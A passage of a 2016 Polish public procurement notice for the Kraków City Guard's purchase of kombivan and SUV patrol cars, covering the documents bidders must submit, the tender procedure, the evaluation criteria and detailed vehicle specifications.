b)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu 
o art. 24 ust. 1 i ust. 5 pkt 1 ustawy Pzp, 
c)	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu 
z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji 
- dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności, zgodnie z załącznikiem 
nr 4A do SIWZ;
d)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne, zgodnie 
z załącznikiem nr 4A do SIWZ;
e)	oświadczenia wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny 
w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 Pzp, zgodnie z załącznikiem nr 4A do SIWZ;
f)	oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających 
z przepisów prawa pracy, prawa ochrony środowiska lub przepisów 
o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 Pzp, zgodnie z załącznikiem nr 4A 
do SIWZ;
g)	oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. 
o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716), zgodnie 
z załącznikiem nr 4A do SIWZ;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	w zakresie wskazanym w rozdziale V pkt. 1 lit. a) i b) - oświadczenie Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1b ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ;
b)	w zakresie wskazanym w rozdziale V pkt. 1 lit. c) :
- oświadczenie Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1b ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ, 
- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
 w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których dostawy zostały lub są wykonywane, zgodnie ze wzorem stanowiącym załącznik nr 7 do SIWZ,
- dowodów potwierdzających, że dostawy ujęte w wykazie zostały wykonane 
należycie, przy czym dowodem może być:
	poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej, niż na 3 miesiące przed upływem terminu składania ofert;
	oświadczenie Wykonawcy  jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa pod lit. a).
Wykonawca nie ma obowiązku przedkładania powyższych dowodów, 
w przypadku gdy podmiotem, na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane, jest Zamawiający. Stosownie do treści § 1 ust. 4 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r., poz. 1126 - dalej Rozporządzenie w sprawie dokumentów), obowiązek wskazania głównych dostaw w wykazie 
i przedstawienia dowodów ich należytego wykonania dotyczy jedynie dostaw wymaganych w pkt. III SIWZ. W razie konieczności, w szczególności, gdy wykaz lub dowody, o których mowa powyżej, będą budzić wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynikać będzie, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się  bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów - bezpośrednio Zamawiającemu.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W celu wykazania, iż zaoferowana dostawa w ramach złożonej oferty dla każdej części oddzielnie spełnia wymagania określone w Specyfikacji istotnych warunków zamówienia, Wykonawca musi dołączyć do oferty:
- opis przedmiotu zamówienia (zgodnie ze wzorem stanowiącym załącznik nr 2  
i załącznik nr 3 do SIWZ) wraz z katalogiem kolorów nadwozia bądź wzornikiem producenta  opisanym i podpisanym przez Wykonawcę (osobę upoważnioną 
do składania oferty).
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji mechanicznej, bez limitów  kilometrów </td><td>15</td></tr><tr><td>Koszt eksploatacji 1 pojazdu w pierwszym roku użytkowania </td><td>15</td></tr><tr><td>Częstotliwość przeglądów </td><td>5</td></tr><tr><td>Dostawa</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszcza się zmiany umowy wynikające 
z następujących przesłanek:
a) wprowadzenie lub zmiana podwykonawcy w zakresie wykonania usługi doposażenia samochodów,
b) przekształcenie formalno - prawne którejkolwiek ze Stron umowy,
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Samochód osobowy typu kombivan w wersji osobowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ I
Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, fabrycznie nowych, nieużywanych, wyprodukowanych w 2015 lub 2016 r.  2 szt.
Oznaczenie przedmiotu zamówienia wg CPV 34.11.00.00-1
Samochód osobowy typu kombivan w wersji osobowej  2 szt.
Minimalne oczekiwane rozwiązania konstrukcyjne i wyposażenie samochodu:
1)	przystosowany do przewozu 5 osób i zarejestrowany na 5 osób;
2)	jednostka napędowa silnik benzynowy, spełniający normę emisji spalin EURO 5 lub 6 (wartości emisji dla nowych pojazdów z silnikiem benzynowym);
3)	moc silnika minimum 105 KM; 
4)	gwarancje: mechaniczna minimum 24 miesiące - bez limitów kilometrów lub 
 z limitem kilometrów nie mniejszym, niż 100 tysięcy kilometrów, na powłokę 
 lakierniczą minimum 24 miesiące, na perforację minimum 72 miesiące;                                      
5)	system zapobiegający zablokowaniu się kół podczas hamowania (ABS) 
lub równoważny spełniający podobne zadania;
6)	system stabilizacji toru jazdy (ESP) lub równoważny spełniający podobne zadania;
7)	pojemność bagażnika, bez złożonych siedzeń, standardowa do wysokości półki 
 minimum 500 dm;
8)	bagażnik wyposażony w dodatkową gumowaną podkładkę;
9)	wspomaganie układu kierowniczego  rozwiązanie producenta samochodu;
10)	immobiliser wraz z centralnym zamkiem sterowanym pilotem (2 szt);
11)	minimum czołowe poduszki powietrzne z przodu dla kierowcy i pasażera (kabina kierowcy);
12)	klimatyzacja minimum ręczna;
13)	drzwi boczne tylne przeszklone po obydwu stronach pojazdu lub drzwi przesuwne przeszklone minimum po obydwu stronach pojazdu;
14)	dostęp do bagażnika: klapa lub dwuskrzydłowe drzwi z przeszkleniami w części górnej wraz z wycieraczką minimum 1 szt.;
15)	kierownica regulowana, co najmniej w jednej płaszczyźnie;
16)	światła do jazdy dziennej;
17)	czujniki parkowania tylne;
18)	fotel kierowcy z ręczną regulacją, co najmniej w dwóch płaszczyznach;
19)	tapicerka materiałowa foteli dla kierowcy i pasażerów bez wzorów w jaskrawych 
kolorach;
20)	w przedziale pasażerskim dywaniki podłogowe, gumowe (4 sztuki) i dodatkowe pokrowce na wszystkich fotelach bez wzorów w jaskrawych kolorach;
21)	boki wewnątrz pojazdu mogą być wykonane z tworzywa sztucznego, 
22)	wyposażenie pojazdu: trójkąt ostrzegawczy i gaśnica A+B+C, umocowana 
w odpowiednim uchwycie, o swobodnym dostępie do niej;
23)	pełnowymiarowe koło zapasowe lub koło dojazdowe, odpowiednio zamontowane, 
Zamawiający nie dopuszcza zestawu naprawczego do kół;
24)	dodatkowy komplet 4 opon zimowych zamontowanych na felgach stalowych;
25)	kolor nadwozia srebrny metalizowany, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tekst jednolity: Dz. U. z 2015 r., 
poz. 305 z późn. zm.)  należy dołączyć katalog z zaznaczonym kolorem oferowanego pojazdu lub wzornik producenta;
26)	oznakowanie samochodu  zgodnie z cytowanym rozporządzeniem  szczegóły 
rozmieszczenia oklejenia uzgadniane po wyborze oferty, projekt oklejenia 
(wizualizacja w formie elektronicznej) ma zostać dostarczony (przesłany drogą elektroniczną) przez Wykonawcę, w terminie 14 dni roboczych od daty zawarcia umowy, celem jego uzgodnienia z Zamawiającym;
27)	na dachu instalacja sygnalizacyjno-ostrzegawcza świetlna (błyskowa) LED, 
 światło w kolorze niebieskim, belka z napisem Straż Miejska (Ż  z kropką), 
z możliwością podawania komunikatów głosowych wraz z manipulatorem 
(sterowanie i mikrofon), o niskim poborze prądu  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków 
technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tekst 
jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.), zamontowana na relingach 
dachowych wzdłużnych lub na belce poprzecznej lub bezpośrednio na dachu 
pojazdu; dopuszcza się zamontowanie głośnika w innym miejscu, niż na belce świetlnej. Zamawiający wymaga belki LZN  LF lub rozwiązania, 
co najmniej równoważnego;
28)	belka sygnalizacyjno - ostrzegawcza (błyskowa) LED musi zapewnić możliwość podświetlenia (dotyczy napisu Straż Miejska);
29)	manipulator osadzony na zaczepie w uchwycie zamontowanym w pojeździe w łatwo dostępnym miejscu.

Samochody muszą spełniać wymagania techniczne określone w rozporządzeniu Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów 
oraz zakresu ich niezbędnego wyposażenia (tekst jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.).
Samochody przed dostarczeniem, muszą być, co najmniej zarejestrowane czasowo 
na podstawie homologacji producenta, przy wykorzystaniu pisemnego upoważnienia 
wystawionego przez Zamawiającego, który dopuszcza przekazanie pojazdów z pozwoleniem czasowym. 
Każdy samochód musi być wyposażony w środki łączności (radiostację), zgodnie z opisem 
w niniejszym rozdziale w pkt. A.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji mechanicznej, bez limitów  kilometrów </td><td>15</td></tr><tr><td>Koszt eksploatacji 1 pojazdu w pierwszym roku użytkowania </td><td>15</td></tr><tr><td>Częstotliwość przeglądów </td><td>5</td></tr><tr><td>Dostawa</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Pojazd typu SUV, mini SUV, crossover  o zwiększonym prześwicie,  wynoszącym minimum 155 mm i z napędem na jedną oś <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, w ilości 2 sztuk, fabrycznie nowych, nieużywanych, wyprodukowanych w 2016 lub 2015 roku. 
Samochód osobowy, fabrycznie nowy (rok produkcji 2016 lub 2015) - 2 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 34.11.00.00-1  
Specyfikacja  oczekiwane rozwiązania konstrukcyjne i wyposażenie samochodu:
1)	pojazd typu SUV, mini SUV, crossover  o zwiększonym prześwicie, 
wynoszącym minimum 155 mm i z napędem na jedną oś;
2)	przystosowany do przewozu 5 osób oraz rejestrowany na 5 osób;
3)	jednostka napędowa: silnik  benzynowy spełniający normę emisji spalin EURO 5 lub EURO 6;
4)	moc silnika minimum 105 KM;
5)	pojemność bagażnika, bez złożonych siedzeń, standardowa do wysokości półki 
 minimum 300 dm:
6)	system zapobiegający zablokowaniu się kół podczas hamowania (ABS)
 lub równoważny spełniający podobne zadania;
7)	system stabilizacji toru jazdy (ESP) lub równoważny spełniający podobne 
zadania;
8)	immobiliser wraz z centralnym zamkiem sterowanym pilotem (2 szt.);
9)	minimum czołowe poduszki powietrzne z przodu (kierowcy i pasażera  kabina kierowcy);
10)	wspomaganie układu kierowniczego;
11)	światła do jazdy dziennej;
12)	klimatyzacja minimum manualna;
13)	kierownica regulowana, co najmniej w jednej płaszczyźnie;
14)	drzwi boczne tylne po obydwu stronach pojazdu;
15)	szyba klapy od bagażnika wyposażona w ogrzewanie i wycieraczkę;
16)	fotel kierowcy z ręczną regulacją, co najmniej w dwóch płaszczyznach;
17)	czujniki parkowania tylne;
18)	tapicerka materiałowa foteli dla kierowcy i pasażerów bez wzorów w jaskrawych 
kolorach;
19)	w przedziale pasażerskim dywaniki podłogowe, gumowe (4 sztuki) i dodatkowe pokrowce na wszystkich fotelach bez wzorów w jaskrawych kolorach;
20)	wyposażenie pojazdu: trójkąt, gaśnica typu A+B+C będąca wyposażeniem pojazdu, umocowana w odpowiednim uchwycie, o swobodnym dostępie do niej;
21)	pełnowymiarowe koło zapasowe lub koło dojazdowe, odpowiednio zamontowane, 
Zamawiający nie dopuszcza zestawu naprawczego do kół;
22)	dodatkowy komplet 4 opon zimowych zamontowanych na felgach stalowych;
23)	kolor nadwozia srebrny metalizowany, zgodnie z rozporządzeniem Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych 
pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2015 r. poz. 305 
z późn. zm.) - należy dołączyć katalog z zaznaczonym kolorem oferowanego pojazdu lub wzornik producenta;
24)	oznakowanie samochodu  zgodnie z cytowanym rozporządzeniem  szczegóły 
rozmieszczenia oklejenia uzgadniane po wyborze oferty, projekt oklejenia 
(wizualizacja w formie elektronicznej) ma zostać dostarczony (przesłany drogą 
elektroniczną) przez Wykonawcę, w terminie 14 dni roboczych od daty zawarcia umowy, celem jego uzgodnienia z Zamawiającym;
25)	na dachu instalacja sygnalizacyjno-ostrzegawcza świetlna (błyskowa) LED, 
 światło w kolorze niebieskim, belka z napisem Straż Miejska (Ż  z kropką), 
z możliwością podawania komunikatów głosowych wraz z manipulatorem 
(sterowanie i mikrofon), o niskim poborze prądu  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków 
technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tekst 
jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.), zamontowana na relingach 
dachowych wzdłużnych lub na belce poprzecznej lub bezpośrednio na dachu 
pojazdu; dopuszcza się zamontowanie głośnika w innym miejscu, niż na belce świetlnej. Zamawiający wymaga belki LZN  LF lub rozwiązania, 
co najmniej równoważnego;
26)	belka sygnalizacyjno - ostrzegawcza (błyskowa) LED musi zapewnić możliwość podświetlenia (dotyczy napisu Straż Miejska);
27)	gwarancje: mechaniczna minimum 24 miesiące - bez limitów kilometrów lub 
z limitem kilometrów nie mniejszym, niż 100 tysięcy kilometrów, na powłokę 
lakierniczą minimum 24 miesiące, na perforację minimum 72 miesiące;
28)	manipulator osadzony na zaczepie w uchwycie zamontowanym w pojeździe
 w łatwo dostępnym miejscu.

Samochody muszą spełniać wymagania techniczne określone w rozporządzeniu Ministra 
Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów 
oraz zakresu ich niezbędnego wyposażenia tekst jednolity: Dz. U. z 2015 r., poz. 305 z późn. zm.).
Samochody przed dostarczeniem, muszą być, co najmniej zarejestrowane czasowo 
na podstawie homologacji producenta, przy wykorzystaniu pisemnego upoważnienia 
wystawionego przez Zamawiającego, który dopuszcza przekazanie pojazdów z pozwoleniem czasowym.
Każdy samochód musi być wyposażony w środki łączności (radiostację), zgodnie z opisem 
w niniejszym rozdziale w pkt. A.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34110000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji mechanicznej, bez limitów  kilometrów </td><td>15</td></tr><tr><td>Koszt eksploatacji 1 pojazdu w pierwszym roku użytkowania </td><td>15</td></tr><tr><td>Częstotliwość przeglądów </td><td>5</td></tr><tr><td>Dostawa</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Pojazd typu SUV, mini SUV, crossover  o zwiększonym prześwicie,      wynoszącym powyżej 155 mm i z napędem na dwie osie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa samochodów osobowych dla Straży Miejskiej Miasta Krakowa, w ilości 4 sztuk, fabrycznie nowych, nieużywanych, wyprodukowanych w 2016 lub 2015 roku.
Samochód osobowy, fabrycznie nowy, nieużywany (rok produkcji 2016 lub 2015) - 4 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 34.11.00.00-1  
Specyfikacja  oczekiwane rozwiązania konstrukcyjne i wyposażenie samochodu:
    1) pojazd typu SUV, mini SUV, crossover  o zwiększonym prześwicie, 
    wynoszącym powyżej 155 mm i z napędem na dwie osie;
2)	przystosowany do przewozu 5 osób oraz rejestrowany na 5 osób;
3)	jednostka napędowa: silnik  benzynowy spełniający normę emisji spalin EURO 5 lub EURO 6;
4)	moc silnika minimum 105 KM;
5)	pojemność bagażnika, bez złożonych siedzeń, standardowa do wysokości półki 
 minimum 300 dm:
6)	system zapobiegający zablokowaniu się kół podczas hamowania (ABS)
lub równoważny spełniający podobne zadania;
7)	system stabilizacji toru jazdy (ESP) lub równoważny spełniający podobne 
zadania;
8)	immobiliser wraz z centralnym zamkiem sterowanym pilotem (2 szt.);
